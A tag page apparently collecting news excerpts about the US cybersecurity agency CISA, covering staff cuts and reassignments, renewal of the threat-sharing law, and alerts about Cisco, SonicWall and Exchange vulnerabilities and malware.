#cisa

#cisa

Staff within the Stakeholder Engagement Division, as well as the cyber-defense agency's Infrastructure Security Division, were targeted with reduction-in-force notices, or RIFs, said the people. OMB Director Russ Vought announced the actions on Friday in line with Trump administration promises to enact layoffs during the ongoing government shutdown. The Integrated Operations Division is also believed to have been impacted, one of the people said.

The CISA law was due for renewal along with the federal government's continuing funding resolution, but given the Senate's inability to pass it and the government shutdown that followed, Peters and Rounds want it extended without having to wait for the government to reopen in order to do so. The CISA law, for those unfamiliar, establishes a framework and legal protections for companies to share threat indicators with the government and each other.

Bloomberg reported Wednesday that the department moved staffers from the U.S. cybersecurity agency CISA, many of whom focus on issuing cyber guidance to help U.S. government agencies and critical infrastructure defend from cyber threats, to other agencies within the federal department, including Immigration and Customs Enforcement (ICE) and Customs and Border Protection (CBP). Both Bloomberg and Nextgov reported that many of the affected CISA staffers are in the agency's Capacity Building unit, which helps to improve the cybersecurity posture of federal agencies,

The Cybersecurity and Infrastructure Security Agency is ordering federal agencies to patch Cisco devices that have been exploited by an advanced hacker group, it said in a Thursday alert. The hacking activity targeting the devices "is widespread and involves exploiting zero-day vulnerabilities to gain unauthenticated remote code execution" on various Cisco Adaptive Security Appliances, CISA said. A "zero-day" refers to a software flaw that's being exploited but has not been previously discovered, giving developers zero days to fix it.

The update comes about two months after Google warned that some unknown criminals have been exploiting fully patched, end-of-life SonicWall SMA 100 appliances to deploy a previously unknown backdoor and rootkit dubbed OVERSTEP. The malware modifies the appliance's boot process to maintain persistent access, enabling the criminals to steal sensitive credentials and conceal their own components. The Chocolate Factory's intel analysts in July attributed the ongoing campaign to UNC6148 - UNC in Google's threat-group naming taxonomy stands for "Uncategorized."

We'll take whatever the Congress decides to authorize us, wherever they see fit within their purview, to authorize and to give us our authorities to be able to use,

CVE-2025-53786 is an elevation of privilege bug that Outsider Security's Dirk-jan Mollema reported to Microsoft. It exists because of the way hybrid Exchange deployments, which connect on-premises Exchange servers to Exchange Online, use a shared identity to authenticate users between the two environments.

CISA analysed six files including two Dynamic Link-Library (.DLL), one cryptographic key stealer, and three web shells. Cyber threat actors could leverage this malware to steal cryptographic keys and execute a Base64-encoded PowerShell command to fingerprint host system and exfiltrate data.

In an Exchange hybrid deployment, an attacker who first gains administrative access to an on-premises Exchange server could potentially escalate privileges within the organization's connected cloud environment without leaving easily detectable and auditable traces.

Homeland Security's Cybersecurity & Infrastructure Security Agency warned US defense contractors working in Israel that they may be targeted by Iranian cyber attacks.

Achieving better memory safety demands language-level protections, library support, robust tooling, and developer training, as traditional languages can't eliminate vulnerabilities as effectively.

For anyone who still has doubts about MFA: just ask Snowflake CISO Brad Jones, who last year saw more than 160 of his customers' accounts compromised using stolen credentials. None of these had MFA enabled, and this safeguard likely would have prevented the intruders from accessing the customers' databases.